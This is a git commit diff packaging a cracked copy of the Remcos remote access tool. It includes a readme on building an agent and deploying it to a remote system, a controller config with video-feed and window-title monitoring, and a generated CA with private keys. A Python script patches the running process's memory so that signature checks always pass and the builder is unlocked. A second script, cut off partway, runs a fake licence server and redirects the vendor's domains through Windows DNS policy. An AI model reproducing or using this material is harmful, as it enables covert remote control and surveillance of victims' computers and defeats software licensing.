initial commit
This commit is contained in:
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,3 @@
|
||||
REMCOS v1.7 Professional
|
||||
|
||||
THE APPLICATION NEEDS ADMIN PRIVILEGES TO RUN PROPERLY
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,75 @@
|
||||
______
|
||||
(_____ \
|
||||
_____) )_____ ____ ____ ___ ___
|
||||
| __ /| ___ | \ / ___) _ \ /___)
|
||||
| | \ \| ____| | | ( (__| |_| |___ |
|
||||
|_| |_|_____)_|_|_|\____)___/(___/
|
||||
|
||||
© BreakingSecurity.net
|
||||
|
||||
|
||||
************************
|
||||
* Zip Password *
|
||||
************************
|
||||
|
||||
Zip Password is: BreakingSecurity.net
|
||||
|
||||
************************
|
||||
* License Activation *
|
||||
************************
|
||||
|
||||
To activate your Remcos Professional Edition license
|
||||
(not needed for Remcos Free Edition):
|
||||
|
||||
1) Open KeyGen.exe
|
||||
2) Insert your BreakingSecurity.net registration email and password
|
||||
3) Click "Generate Key"
|
||||
4) Click "Activate Key"
|
||||
5) License is activated automatically and immediately.
|
||||
You should receive a confirmation email within a minute.
|
||||
|
||||
************************
|
||||
* Quick Setup *
|
||||
************************
|
||||
|
||||
This brief guide will help you out in establishing a successful connection using Remcos.
|
||||
|
||||
For more in-depth instructions, consult:
|
||||
|
||||
Instruction Manual:
|
||||
https://BreakingSecurity.net/remcos/manual
|
||||
|
||||
VideoTutorials:
|
||||
https://BreakingSecurity.net/tutorials
|
||||
|
||||
Support:
|
||||
https://BreakingSecurity.net/support
|
||||
|
||||
|
||||
1) INSTALL REMCOS
|
||||
Remcos is portable and does not require an installation.
|
||||
Just extract Remcos.exe file in any folder and execute it.
|
||||
Zip Password is: BreakingSecurity.net
|
||||
If later on you download a new Remcos update and want to keep all your settings,
|
||||
just place the new Remcos.exe in the same folder.
|
||||
|
||||
2) OPEN LISTENING PORT
|
||||
The first step to do is open a TCP port for Remcos Controller.
|
||||
This port will be used to listen for incoming connections.
|
||||
Go to Local Settings -> Connection
|
||||
to add a listening port.
|
||||
Make sure your firewall allows Remcos connection.
|
||||
|
||||
3) SETUP AGENT CONNECTION
|
||||
Go to Agent Builder -> Connection
|
||||
to specify where your Remcos Agent should connect.
|
||||
You should enter the IP or DNS address and listening port of your Remcos Controller here.
|
||||
|
||||
4) BUILD AGENT
|
||||
Go to Agent Builder -> Build
|
||||
to build a Remcos Agent.
|
||||
Deploy the agent to the remote system and execute it.
|
||||
|
||||
5) ESTABLISH CONNECTION
|
||||
If the above steps were correctly done,
|
||||
your new Remcos connection will popup in the Connections tab.
|
||||
Binary file not shown.
@@ -0,0 +1,110 @@
|
||||
[Terms]
|
||||
ShowTermsOfUsage=0
|
||||
[Tip]
|
||||
ListeningPort=0
|
||||
AgentBuilder=0
|
||||
AgentBuilderBuild=0
|
||||
[Firewall]
|
||||
CheckOnStartup=1
|
||||
[Settings]
|
||||
UserEmail=[email protected]
|
||||
Language=English
|
||||
AutoSaveOnExit=1
|
||||
DisplayOfflineAgents=1
|
||||
MoveHighlightedOnTop=1
|
||||
HighlightOutdatedAgents=0
|
||||
GroupView=1
|
||||
chkLatencyOnHostConnection=1
|
||||
chkUpdateOnStartup=1
|
||||
chkPublicIPOnStartup=1
|
||||
ConfirmUninstall=0
|
||||
GeoIP=1
|
||||
MinimizeToSysTray=0
|
||||
PingHost=1
|
||||
PingInterval=30
|
||||
PingTimeout=30
|
||||
VisualStyle=
|
||||
DoubleClickAction=0
|
||||
[FunctionsMenu]
|
||||
ShowShortKeys=1
|
||||
Categorized=1
|
||||
[Ports]
|
||||
NumberOfPorts=0
|
||||
[Font]
|
||||
Font=Arial
|
||||
Size=8
|
||||
[PreviewPanel]
|
||||
Show=1
|
||||
VideoFeed=1
|
||||
[Toolbar]
|
||||
Show=1
|
||||
[StatBar]
|
||||
ShowEverywhere=0
|
||||
[EventLog]
|
||||
Verbose=0
|
||||
Sockets=0
|
||||
AutoScroll=1
|
||||
InvalidConnections=1
|
||||
[Notifications]
|
||||
Style=2
|
||||
Timeout=10
|
||||
[ActivityNotification]
|
||||
Disconnection=0
|
||||
UserActivity=0
|
||||
WindowEnter=0
|
||||
WindowTitles=notepad;google;
|
||||
NotificationType=1
|
||||
IdleTimeThreshold=1
|
||||
[AutoTasks]
|
||||
Enabled=0
|
||||
FirstConnectionOnly=1
|
||||
[Telegram]
|
||||
BotActive=0
|
||||
ChatID=
|
||||
ConnNotification=1
|
||||
[ShortcutButtons]
|
||||
1=2
|
||||
2=4
|
||||
3=5
|
||||
4=11
|
||||
5=12
|
||||
6=24
|
||||
7=30
|
||||
[IP_Blacklist]
|
||||
Enabled=1
|
||||
LogRepetitive=1
|
||||
NumberOfIPs=0
|
||||
[ColumnIndex]
|
||||
Location=0
|
||||
AssignedName=1
|
||||
ComputerUser=2
|
||||
OperativeSystem=3
|
||||
Latency=4
|
||||
ActiveWindow=5
|
||||
Uptime=6
|
||||
IdleTime=7
|
||||
IpAddress=8
|
||||
Port=9
|
||||
RAM=10
|
||||
CPU=11
|
||||
Version=12
|
||||
InstallTime=13
|
||||
Mutex=14
|
||||
UID=15
|
||||
[ColumnWidth]
|
||||
Location=100
|
||||
AssignedName=100
|
||||
ComputerUser=150
|
||||
OperativeSystem=150
|
||||
Latency=70
|
||||
ActiveWindow=150
|
||||
IdleTime=100
|
||||
Uptime=100
|
||||
IpAddress=100
|
||||
Port=44
|
||||
RAM=70
|
||||
CPU=100
|
||||
Version=70
|
||||
InstallTime=100
|
||||
Mutex=100
|
||||
UID=100
|
||||
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
Binary file not shown.
@@ -0,0 +1,18 @@
|
||||
-----BEGIN CERTIFICATE-----
|
||||
MIIC8jCCAdqgAwIBAgIUIwMGQAbxdBWbFIO91vqxQ0j9RBAwDQYJKoZIhvcNAQEL
|
||||
BQAwGTEXMBUGA1UEAwwOUmVtY29zIFRlc3QgQ0EwHhcNMjYwNDIxMjExMTE3WhcN
|
||||
MzYwNDE4MjExMTE3WjAZMRcwFQYDVQQDDA5SZW1jb3MgVGVzdCBDQTCCASIwDQYJ
|
||||
KoZIhvcNAQEBBQADggEPADCCAQoCggEBAK3JTJdWpB5YGSNkmyBi1wDZCC72Jquf
|
||||
8mGHg51kt4otpvtlg/LPlUQ6jAba3FpFKUIsJ/0qX8DROraQ8aCpUCTiWUrtxS02
|
||||
nXeZXiB2apfXO8sogjPmOD9jUURzvMTfga7lEMPgU75pb1DBTv+wB8Dl7UALZfnS
|
||||
dJs7uvVD6ZTKuZNgVrEOfJUHhkB+FhJHJVVtaq4PgprRGWadYX+VI3EcZPWwFdCm
|
||||
WI3lBmA86aknrhLQJKqrZutOdvQ4PEoJbjvCTODqoNsMT3mds7BmPcmoNQCWHQ+D
|
||||
zJQnmmmcdUa7+UBNo5DsDkT/vfif4gJA+k7ETX2Xxl8fAv5C4vJE8ZcCAwEAAaMy
|
||||
MDAwHQYDVR0OBBYEFPeHvg2zKcG9mZn04z0b4IpzrqejMA8GA1UdEwEB/wQFMAMB
|
||||
Af8wDQYJKoZIhvcNAQELBQADggEBAD0Okkl4iWvM5KS4AAkfyKvw5vDzLpwO/jzp
|
||||
LXGKjMK1QHcmB1PuJgIfYY+aORZaDgRa/2Ct4gegJ75LeSL95Iz9iwbQ6wT3hOea
|
||||
unizoOPl78i4NIhfGk0LSRxKnEHU25w4HUoW9oXtbrFuhkJNhbXLb6UQ/bf9lpwc
|
||||
Uyo88q1vIBZ3pJ7IYaw+YMPSK2D8u7gblMg1LTtmPe4VHOrYg96osuesMUqjWroB
|
||||
WNTknBI6Noj9U4vSIQC1g0yfk0SCslTnCBP80EPAq1owkzF8LQcUf6e2NtILJSzT
|
||||
3/cO2lEhF6Pewcf9+YStbvII5zXXqMSfKEZahZ6mJTfB/FUbNvE=
|
||||
-----END CERTIFICATE-----
|
||||
@@ -0,0 +1,28 @@
|
||||
-----BEGIN PRIVATE KEY-----
|
||||
MIIEvQIBADANBgkqhkiG9w0BAQEFAASCBKcwggSjAgEAAoIBAQCtyUyXVqQeWBkj
|
||||
ZJsgYtcA2Qgu9iarn/Jhh4OdZLeKLab7ZYPyz5VEOowG2txaRSlCLCf9Kl/A0Tq2
|
||||
kPGgqVAk4llK7cUtNp13mV4gdmqX1zvLKIIz5jg/Y1FEc7zE34Gu5RDD4FO+aW9Q
|
||||
wU7/sAfA5e1AC2X50nSbO7r1Q+mUyrmTYFaxDnyVB4ZAfhYSRyVVbWquD4Ka0Rlm
|
||||
nWF/lSNxHGT1sBXQpliN5QZgPOmpJ64S0CSqq2brTnb0ODxKCW47wkzg6qDbDE95
|
||||
nbOwZj3JqDUAlh0Pg8yUJ5ppnHVGu/lATaOQ7A5E/734n+ICQPpOxE19l8ZfHwL+
|
||||
QuLyRPGXAgMBAAECggEAG5sz5NaJO54YYDGbHYnrSDcxwEQEiz7dQfZE8hENwZAp
|
||||
oRsp2r3Jowz/MWzoPsQTHxqPP6gmOHsELfwtu1fUuLHm0qryp5Fax6TqpD2AsUjU
|
||||
4XDjPgX+6Wgy1gI3T7mG4EGDEu/lCFph/xy2GpKGqMiIPPmSjseKaR5pPzeKjhgN
|
||||
tIpyKUqrc5dV4KLB24zduSb+pBFLhmLnvxhAMaKcJO3PUcSm2aZkG0a0Qa1T4AIG
|
||||
/Smc2BxCrpQpfazZeCefpUGLBXGImCBbjDoOgQi1cvSUuKqS0tkrR5TIKKgIZ7V8
|
||||
fZU6fcbPwSzWKazjwQZyc+XvEkwqDQ6RLsiF25LgAQKBgQDUF5FzPjWTSIW78+0h
|
||||
SIqTc8JiQvNuqCRy7AlZsUKu1BHpZEAzq85YompNK+nOIecL+WTf+s+vpopYh1xh
|
||||
iOOZEyJGIOPFTXIbOG0HeHvqpIbOh9L4pm0H/FHTfgJNjPqMPeBeTmNvTBBenvdF
|
||||
Q3yoL+M8KSwitT7IyrWjr8ARzwKBgQDRw5uTfOR3gWwMmEnQG7w17iRqPqb5Itgb
|
||||
JqTVug5xzhuO/QLzPB/seBDmHPEA+IzJ/PH5GoUGNxbv0prCwzgh9Ox6g0JQ0uPz
|
||||
KIcY7ebi/Ub7ZFISo0kstK+elwHd5Vkw/+SMIwa26DtjhJmX8anf5iX6cFdFJElz
|
||||
cmUiC1p9uQKBgFNOhpUrpEObwtvWrhfatIPCfmG2RoP6i4aQbAPM+pJNPlPcStOA
|
||||
8mYiNXrmesm6y1QKu7K2g4lM8x5e3Mx6xltEBrxhAtZm2yESAtFiY9oAkerhst50
|
||||
EHOIimN2JVVswKUBUPX5+FipGezwp9OO9JHjbXAeA/YGFwkrhjkrOVhFAoGASD1f
|
||||
VNnMLMPrnCLOONd0Z/ZNoDFXe7FeT2ttlRVwaA0dPI8x9uab7+ohl74b2cO/aMit
|
||||
5KYXbd6HDaywE6b7q+YXktGlgwQ98L3iWNmFjGLBkU4pXbXSO402dh13TR3xK4jV
|
||||
AtYFN/Sej1VZOBTH9g3iwm7x/yPSD+oznhfe4DECgYEAixrscj/7mcjY2GwwOhkd
|
||||
MuEpTfQH23CpaP+5sqjlPRjbHn3nHm6BUVC+Z8vfP3jt6HPV/QcCqvkGGhVC/OqC
|
||||
SwR/UQwuuwfSlN6cP+urwEQcs5gGHeyKu7ydycEpkG1A+S5/5WzLc49aXWbWwI5r
|
||||
nDaWMQ07OhtWEkGW4r/MXh8=
|
||||
-----END PRIVATE KEY-----
|
||||
@@ -0,0 +1 @@
|
||||
0A81D0AFDD39068AABD46C1EA996127D1994F7B2
|
||||
@@ -0,0 +1,19 @@
|
||||
-----BEGIN CERTIFICATE-----
|
||||
MIIC8jCCAdqgAwIBAgIUIwMGQAbxdBWbFIO91vqxQ0j9RBAwDQYJKoZIhvcNAQEL
|
||||
BQAwGTEXMBUGA1UEAwwOUmVtY29zIFRlc3QgQ0EwHhcNMjYwNDIxMjExMTE3WhcN
|
||||
MzYwNDE4MjExMTE3WjAZMRcwFQYDVQQDDA5SZW1jb3MgVGVzdCBDQTCCASIwDQYJ
|
||||
KoZIhvcNAQEBBQADggEPADCCAQoCggEBAK3JTJdWpB5YGSNkmyBi1wDZCC72Jquf
|
||||
8mGHg51kt4otpvtlg/LPlUQ6jAba3FpFKUIsJ/0qX8DROraQ8aCpUCTiWUrtxS02
|
||||
nXeZXiB2apfXO8sogjPmOD9jUURzvMTfga7lEMPgU75pb1DBTv+wB8Dl7UALZfnS
|
||||
dJs7uvVD6ZTKuZNgVrEOfJUHhkB+FhJHJVVtaq4PgprRGWadYX+VI3EcZPWwFdCm
|
||||
WI3lBmA86aknrhLQJKqrZutOdvQ4PEoJbjvCTODqoNsMT3mds7BmPcmoNQCWHQ+D
|
||||
zJQnmmmcdUa7+UBNo5DsDkT/vfif4gJA+k7ETX2Xxl8fAv5C4vJE8ZcCAwEAAaMy
|
||||
MDAwHQYDVR0OBBYEFPeHvg2zKcG9mZn04z0b4IpzrqejMA8GA1UdEwEB/wQFMAMB
|
||||
Af8wDQYJKoZIhvcNAQELBQADggEBAD0Okkl4iWvM5KS4AAkfyKvw5vDzLpwO/jzp
|
||||
LXGKjMK1QHcmB1PuJgIfYY+aORZaDgRa/2Ct4gegJ75LeSL95Iz9iwbQ6wT3hOea
|
||||
unizoOPl78i4NIhfGk0LSRxKnEHU25w4HUoW9oXtbrFuhkJNhbXLb6UQ/bf9lpwc
|
||||
Uyo88q1vIBZ3pJ7IYaw+YMPSK2D8u7gblMg1LTtmPe4VHOrYg96osuesMUqjWroB
|
||||
WNTknBI6Noj9U4vSIQC1g0yfk0SCslTnCBP80EPAq1owkzF8LQcUf6e2NtILJSzT
|
||||
3/cO2lEhF6Pewcf9+YStbvII5zXXqMSfKEZahZ6mJTfB/FUbNvE=
|
||||
-----END CERTIFICATE-----
|
||||
|
||||
@@ -0,0 +1,5 @@
|
||||
[v3_req]
|
||||
subjectAltName=DNS:breakingsec.io,DNS:*.breakingsec.io,DNS:breakingsecurity.net,DNS:*.breakingsecurity.net,DNS:pro.ip-api.com,DNS:*.ip-api.com,DNS:localhost
|
||||
basicConstraints=CA:FALSE
|
||||
keyUsage=digitalSignature,keyEncipherment
|
||||
extendedKeyUsage=serverAuth
|
||||
@@ -0,0 +1,21 @@
|
||||
-----BEGIN CERTIFICATE-----
|
||||
MIIDdjCCAl6gAwIBAgIUCoHQr905Boqr1GweqZYSfRmU97IwDQYJKoZIhvcNAQEL
|
||||
BQAwGTEXMBUGA1UEAwwOUmVtY29zIFRlc3QgQ0EwHhcNMjYwNDIxMjExMTE3WhcN
|
||||
MzYwNDE4MjExMTE3WjAZMRcwFQYDVQQDDA5icmVha2luZ3NlYy5pbzCCASIwDQYJ
|
||||
KoZIhvcNAQEBBQADggEPADCCAQoCggEBANT30Wpq71rgptJF/Np4NRrsMv8yABzm
|
||||
1Ly8QXEtIDi2Ir7jynY3InMPXFy3arVHBwmwb5PsFKZyVTGVpqxfgBWprNa9QTkP
|
||||
RMAaQKI6daWb4V0cmEsTYwSvxsbeCairOCYzmTwLffGV2DRQhnWavwKw8h+Bsym/
|
||||
P2unzIrk0vlm4yJdkgBApIkKnT/i/s4tHMmy6NFfj8JKOxNloi4wzfCKzgDRsvcV
|
||||
y+1hhrJ1kCaQ0EHolBjyHf2ILmdURV1FTTIar14id5lm9Rmoapk9IT3frW4CsDoZ
|
||||
INSM24kHgWK0fFf5GD2/q0YGz4AAN7HMUqoDLxQgyvJvWs5xMNTJUCMCAwEAAaOB
|
||||
tTCBsjCBggYDVR0RBHsweYIOYnJlYWtpbmdzZWMuaW+CECouYnJlYWtpbmdzZWMu
|
||||
aW+CFGJyZWFraW5nc2VjdXJpdHkubmV0ghYqLmJyZWFraW5nc2VjdXJpdHkubmV0
|
||||
gg5wcm8uaXAtYXBpLmNvbYIMKi5pcC1hcGkuY29tgglsb2NhbGhvc3QwCQYDVR0T
|
||||
BAIwADALBgNVHQ8EBAMCBaAwEwYDVR0lBAwwCgYIKwYBBQUHAwEwDQYJKoZIhvcN
|
||||
AQELBQADggEBAG6WlSlKUyj4G/cjD6mmz6o+Gr6/i9K3eYrIBm8fELQ+8gFdc8mx
|
||||
1rHg1RGN0qqjhwXwThIdkZQzpWS//+q/unLQYrGbi/STpiEfcLOilWX9iR70vEox
|
||||
mjQedc5oVUt/AHOisY7SoSnfo0Anoi4MAk5iPI1vWcgT99qcFDbL0avNoXI2wuul
|
||||
ttNv2JchKvwsoA7Zzty6fhwOZLCe98nt233bwV+46BLCabfTCj6/j3VKvNxx6Lhr
|
||||
ojpqv6a/glcOQ28V3+t03G6npLLfAlMqO1bfj9bBZSuvucqF3+mXdZn/4+92Pi0v
|
||||
7/BzQjn2GxfJ2gPh/XOHRRXZplaLKoXL8pw=
|
||||
-----END CERTIFICATE-----
|
||||
@@ -0,0 +1,15 @@
|
||||
-----BEGIN CERTIFICATE REQUEST-----
|
||||
MIICXjCCAUYCAQAwGTEXMBUGA1UEAwwOYnJlYWtpbmdzZWMuaW8wggEiMA0GCSqG
|
||||
SIb3DQEBAQUAA4IBDwAwggEKAoIBAQDU99Fqau9a4KbSRfzaeDUa7DL/MgAc5tS8
|
||||
vEFxLSA4tiK+48p2NyJzD1xct2q1RwcJsG+T7BSmclUxlaasX4AVqazWvUE5D0TA
|
||||
GkCiOnWlm+FdHJhLE2MEr8bG3gmoqzgmM5k8C33xldg0UIZ1mr8CsPIfgbMpvz9r
|
||||
p8yK5NL5ZuMiXZIAQKSJCp0/4v7OLRzJsujRX4/CSjsTZaIuMM3wis4A0bL3Fcvt
|
||||
YYaydZAmkNBB6JQY8h39iC5nVEVdRU0yGq9eIneZZvUZqGqZPSE9361uArA6GSDU
|
||||
jNuJB4FitHxX+Rg9v6tGBs+AADexzFKqAy8UIMryb1rOcTDUyVAjAgMBAAGgADAN
|
||||
BgkqhkiG9w0BAQsFAAOCAQEAW3LLdzDgNoktVDlSXSd9XHuMn+11jk1RIvKLr+Os
|
||||
ZEKHNOxGoqXrj8H1wLLMP9F/zzz/Z9aCO1/djK2ByC6WGzudtI48vrPu4dB8Gx4h
|
||||
aUfkC/XKavyTma6I/vd2xpUmNxQxQ/sm0LXAw/jWKCJh9tek/GL32Lsm1RVDY8QN
|
||||
0l6fTz4D+AUoLTsKP0NV1WmjD9pIyJ2u9mwQzaFLgdiVZex1RXga5Wj9dKQ3pMhu
|
||||
6ASCJ5zLadOA3kUcgYNhtGAk5TXlXKPGWqcVrzvoL8QqVNupIAe/6Jvy8yqQegYg
|
||||
x3aaJd+f34WjOChrI2Y0JnaLBr5F6GMJN0hhbRpss8ESXA==
|
||||
-----END CERTIFICATE REQUEST-----
|
||||
@@ -0,0 +1,28 @@
|
||||
-----BEGIN PRIVATE KEY-----
|
||||
MIIEvgIBADANBgkqhkiG9w0BAQEFAASCBKgwggSkAgEAAoIBAQDU99Fqau9a4KbS
|
||||
RfzaeDUa7DL/MgAc5tS8vEFxLSA4tiK+48p2NyJzD1xct2q1RwcJsG+T7BSmclUx
|
||||
laasX4AVqazWvUE5D0TAGkCiOnWlm+FdHJhLE2MEr8bG3gmoqzgmM5k8C33xldg0
|
||||
UIZ1mr8CsPIfgbMpvz9rp8yK5NL5ZuMiXZIAQKSJCp0/4v7OLRzJsujRX4/CSjsT
|
||||
ZaIuMM3wis4A0bL3FcvtYYaydZAmkNBB6JQY8h39iC5nVEVdRU0yGq9eIneZZvUZ
|
||||
qGqZPSE9361uArA6GSDUjNuJB4FitHxX+Rg9v6tGBs+AADexzFKqAy8UIMryb1rO
|
||||
cTDUyVAjAgMBAAECggEAJ8WMD1KfFpqjrNszKF2QlVGNCIl+6ebVzdVeZ1NlFBI3
|
||||
lOyXb9JGFbTFq+7495enIdEYVUieZqMtc9Ady00eb207gPLhDlXiofmFHobKV74v
|
||||
rSLc8hBRyptFBPiMVzp6hu/V6xe+UnKIaOSs56OZjlgbL3UaT26O2n0AvuOS3s5X
|
||||
ln717Nx7L7CNC8+df7oEQ65rmfi8lh1h7Hvn2vDnb/EjFfGUYhlfc7Mc5PbR1NuB
|
||||
zKYPhxe3Hh3+WXMnqil2asFP1+hv7UIXty2gAS3ybMDT5n/u1iy/gKy9apjF8acc
|
||||
iB29tZzvMoXIFyONrnlCRK374cPEs1jqOJJmAp5PcQKBgQD9TCPcujuAlmi95o4a
|
||||
qr4Oy0asR2DcqCMiKC1QxK/hLctPf8GmvnCyA89jew1/mdaWnEisvAb3nyuLPH4N
|
||||
bC+tSDumlZ094ecJklH/CVVLePp9eH8X01Z3IaIFqv6zRuWcdu9dvVN0JF/cO3iB
|
||||
6sdXZ+y/LxPEPvkeF2MBwQ1SqQKBgQDXPYWQdroHBC/cXwct0ilW38P0k8bhz/Yx
|
||||
dPsxNBuzaQYr1ul4biexnrgMFLYsCoN+RYPfI7TIagKaGeI46w7LL4zxyosgn4H9
|
||||
yIcnAErSQunRMwieZvpvBMJsIEtvPgbYB8/bBRAvh3RRpUxk2ZhC+6KBOBOlpRmg
|
||||
ekzb9B9X6wKBgBd8wPKNvki9Kbc6MsEcRgVfKg19jOjJGoDnUtRjeJ+bvHeBtDY/
|
||||
AHoxSkDCP00uuaw7j62cvdSmSMZfdJzQBFfAE+/tfagoU2Ea1Umd1u/ppuiNjNNr
|
||||
wF/JmZmG8pkzIMVybd22WY+yc8UbKqB5YcSkGVrdBasz36u/pWmbOh4JAoGBAI/C
|
||||
K389jSo6hazuW2EjSTEY60xjlyYjPA/0TgGjCA1gTBrjw7QH/sMHe222N6Zar1Cb
|
||||
JWTX+FsTUwGR4CKb/JmA/OZRnXMAllXmpT5LV63vuzNanpsNtJ6J00FcoIWALBoF
|
||||
vbJPQ2w7UFlnygphuuyiHPupdJXiG6evh74w4u5ZAoGBANGcigRGWXrjKBht5DgV
|
||||
FWcLOqm5316NbwAbGxPEDY9N792fcT7OlaDkdxBWymDsB6l6DaaUI99WyPbO0X/T
|
||||
a3G2zHcn2/x+pc7t7crdh2L5FbE/U5pYqOJw/WvoBVCjy+AsfNeoIGdKsOnF3m44
|
||||
nM7a1ouNgDRFExgnPYEwDKai
|
||||
-----END PRIVATE KEY-----
|
||||
@@ -0,0 +1,95 @@
|
||||
"""
|
||||
Launch Remcos with SSL_CERT_FILE + apply IAT patches.
|
||||
Run WHILE server_only.py is running in another terminal.
|
||||
"""
|
||||
import ctypes, ctypes.wintypes as wt, struct, subprocess, os, sys, time
|
||||
|
||||
PROCESS_ALL_ACCESS = 0x1F0FFF
|
||||
PAGE_EXECUTE_READWRITE = 0x40
|
||||
MEM_COMMIT, MEM_RESERVE = 0x1000, 0x2000
|
||||
UNPACK_ADDR, UNPACK_SIG = 0x8EEED8, b'\x55\x8b\xec\x6a'
|
||||
|
||||
kernel32 = ctypes.WinDLL('kernel32', use_last_error=True)
|
||||
OpenProcess = kernel32.OpenProcess; OpenProcess.restype = wt.HANDLE
|
||||
ReadProcessMemory = kernel32.ReadProcessMemory; ReadProcessMemory.restype = wt.BOOL
|
||||
WriteProcessMemory = kernel32.WriteProcessMemory; WriteProcessMemory.restype = wt.BOOL
|
||||
VirtualAllocEx = kernel32.VirtualAllocEx; VirtualAllocEx.restype = wt.LPVOID
|
||||
VirtualProtectEx = kernel32.VirtualProtectEx; VirtualProtectEx.restype = wt.BOOL
|
||||
CloseHandle = kernel32.CloseHandle
|
||||
|
||||
def read_mem(h, addr, sz):
|
||||
buf = ctypes.create_string_buffer(sz); n = ctypes.c_size_t(0)
|
||||
return buf.raw[:n.value] if ReadProcessMemory(h, addr, buf, sz, ctypes.byref(n)) else None
|
||||
|
||||
def write_mem(h, addr, data):
|
||||
old = wt.DWORD(0)
|
||||
VirtualProtectEx(h, addr, len(data), PAGE_EXECUTE_READWRITE, ctypes.byref(old))
|
||||
n = ctypes.c_size_t(0); buf = ctypes.create_string_buffer(data)
|
||||
ok = WriteProcessMemory(h, addr, buf, len(data), ctypes.byref(n))
|
||||
VirtualProtectEx(h, addr, len(data), old.value, ctypes.byref(old))
|
||||
return ok and n.value == len(data)
|
||||
|
||||
def main():
|
||||
d = os.path.dirname(os.path.abspath(__file__))
|
||||
exe = os.path.join(d, "Remcos v7.2.2 Pro.exe")
|
||||
|
||||
# Set SSL env
|
||||
ca = os.path.join(d, "certs", "ca_bundle.pem")
|
||||
if os.path.exists(ca):
|
||||
os.environ["SSL_CERT_FILE"] = ca
|
||||
os.environ["SSL_CERT_DIR"] = os.path.join(d, "certs")
|
||||
print(f"[+] SSL_CERT_FILE={ca}")
|
||||
|
||||
# Kill old
|
||||
subprocess.run(['taskkill', '/F', '/IM', 'Remcos v7.2.2 Pro.exe'], capture_output=True)
|
||||
time.sleep(1)
|
||||
|
||||
# Launch
|
||||
proc = subprocess.Popen([exe], cwd=d)
|
||||
pid = proc.pid; print(f"[+] PID {pid}")
|
||||
|
||||
h = None
|
||||
for _ in range(30):
|
||||
h = OpenProcess(PROCESS_ALL_ACCESS, False, pid)
|
||||
if h: break
|
||||
time.sleep(0.1)
|
||||
if not h: print("[-] Can't open"); return
|
||||
|
||||
# Wait unpack
|
||||
print("[*] Waiting for unpack...")
|
||||
t0 = time.time()
|
||||
while time.time() - t0 < 45:
|
||||
if proc.poll() is not None: print("[-] Exited early"); CloseHandle(h); return
|
||||
if read_mem(h, UNPACK_ADDR, 4) == UNPACK_SIG: break
|
||||
time.sleep(0.05)
|
||||
else: print("[-] Timeout"); CloseHandle(h); return
|
||||
print(f"[+] Unpacked {time.time()-t0:.1f}s"); time.sleep(0.2)
|
||||
|
||||
# Stubs
|
||||
page = VirtualAllocEx(h, None, 4096, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
|
||||
stub = bytearray(32)
|
||||
stub[0x00] = 0xC3 # ret
|
||||
stub[0x04:0x07] = b'\xC2\x04\x00' # ret 4
|
||||
stub[0x08:0x10] = b'\xB8\x01\x00\x00\x00\xC2\x18\x00' # CryptVerify -> TRUE
|
||||
write_mem(h, page, bytes(stub))
|
||||
|
||||
# Exit hooks
|
||||
for addr, off, name in [(0x9DF18C,0,"Halt"),(0x4C36428,4,"PostQuitMessage"),
|
||||
(0xA1007C,4,"ExitProcess1"),(0x4C36590,4,"ExitProcess2"),(0x4C36AE8,4,"ExitProcess3")]:
|
||||
write_mem(h, addr, struct.pack('<I', page+off)); print(f" [+] {name}")
|
||||
|
||||
# Crypto IAT
|
||||
for addr in [0x9DF0F8, 0x4C364FC]:
|
||||
write_mem(h, addr, struct.pack('<I', page+0x08)); print(" [+] CryptVerify IAT")
|
||||
|
||||
# Builder gate
|
||||
write_mem(h, 0x983F9C, b'\x01'); print(" [+] Builder gate=1")
|
||||
# TLS init
|
||||
write_mem(h, 0x97126C, struct.pack('<I', 1)); print(" [+] TLS flag=1")
|
||||
|
||||
print(f"\n[+] Done. Remcos PID {pid}")
|
||||
print("[*] Enter email in auth dialog. Server handles the rest.")
|
||||
CloseHandle(h)
|
||||
proc.wait()
|
||||
|
||||
if __name__ == "__main__": main()
|
||||
@@ -0,0 +1,383 @@
|
||||
"""
|
||||
Standalone fake server + DNS redirect.
|
||||
Stays running until you press Ctrl+C.
|
||||
Launch Remcos/KeyGen yourself while this is running.
|
||||
|
||||
Run as Administrator!
|
||||
"""
|
||||
import http.server
|
||||
import os
|
||||
import socket
|
||||
import socketserver
|
||||
import ssl
|
||||
import subprocess
|
||||
import sys
|
||||
import threading
|
||||
import time
|
||||
from datetime import datetime
|
||||
from urllib.parse import urlparse, parse_qs
|
||||
|
||||
VERSION = "7.2.2"
|
||||
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
|
||||
CERT_DIR = os.path.join(SCRIPT_DIR, "certs")
|
||||
CA_CERT = os.path.join(CERT_DIR, "ca.crt")
|
||||
CA_KEY = os.path.join(CERT_DIR, "ca.key")
|
||||
SRV_CERT = os.path.join(CERT_DIR, "server.crt")
|
||||
SRV_KEY = os.path.join(CERT_DIR, "server.key")
|
||||
|
||||
NRPT_BASE = r"HKLM:\System\CurrentControlSet\Services\Dnscache\Parameters\DnsPolicyConfig"
|
||||
NRPT_GUIDS = [
|
||||
("{b1a2c3d4-0001-aaaa-bbbb-000000000001}", [".breakingsec.io", "breakingsec.io"]),
|
||||
("{b1a2c3d4-0001-aaaa-bbbb-000000000002}", [".ip-api.com", "pro.ip-api.com", "ip-api.com"]),
|
||||
("{b1a2c3d4-0001-aaaa-bbbb-000000000003}", [".breakingsecurity.net", "breakingsecurity.net"]),
|
||||
]
|
||||
|
||||
REDIRECT_DOMAINS = {"breakingsec.io", "www.breakingsec.io", "breakingsecurity.net",
|
||||
"www.breakingsecurity.net", "pro.ip-api.com"}
|
||||
REAL_DNS = "8.8.8.8"
|
||||
|
||||
GEO_RESPONSE = "\n".join([
|
||||
"success", "US", "United States", "NA", "North America",
|
||||
"CA", "California", "Los Angeles", "Los Angeles", "90001",
|
||||
"34.0522", "-118.2437", "America/Los_Angeles",
|
||||
"ISP", "ISP Corp", "AS0000", "1.2.3.4",
|
||||
])
|
||||
|
||||
# ============================================================
|
||||
# SSL Certs
|
||||
# ============================================================
|
||||
def generate_certs():
|
||||
os.makedirs(CERT_DIR, exist_ok=True)
|
||||
if os.path.exists(SRV_CERT) and os.path.exists(CA_CERT):
|
||||
print("[*] Certs exist, reusing.")
|
||||
return True
|
||||
print("[*] Generating SSL certificates...")
|
||||
try:
|
||||
